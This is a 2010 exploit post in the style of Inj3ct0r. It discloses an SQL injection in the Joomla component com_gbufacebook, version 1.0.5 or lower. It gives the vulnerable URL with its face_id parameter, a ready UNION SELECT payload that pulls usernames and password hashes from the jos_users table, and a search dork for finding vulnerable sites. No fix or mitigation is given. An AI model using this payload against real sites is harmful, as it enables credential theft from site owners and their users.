Joomla Component com_gbufacebook SQL injection Vulnerability

Posted on 19 April 2010
============================================================
Joomla Component com_gbufacebook SQL injection vulnerability 
============================================================

[!]===========================================================================[!]
 
[~] Joomla Component GBU FACEBOOK SQL injection vulnerability
[~] Author  : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage    : http://www.indonesiancoder.com
[~] Date    : 20 april, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://www.gbugrafici.nl/gbufacebook/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.gbugrafici.nl/gbufacebook/com_gbufacebook.zip
[+] Version : 1.0.5 or lower maybe also affected
 
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_gbufacebook&task=show_face&face_id=[INDONESIANCODER]
 
[ XpL ]
 
-999.9'+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz
 
etc etc etc ;]
 
[!]===========================================================================[!]


# Inj3ct0r.com [2010-04-19]
TOP
Malware :

Last 20
Exploits :

Last 20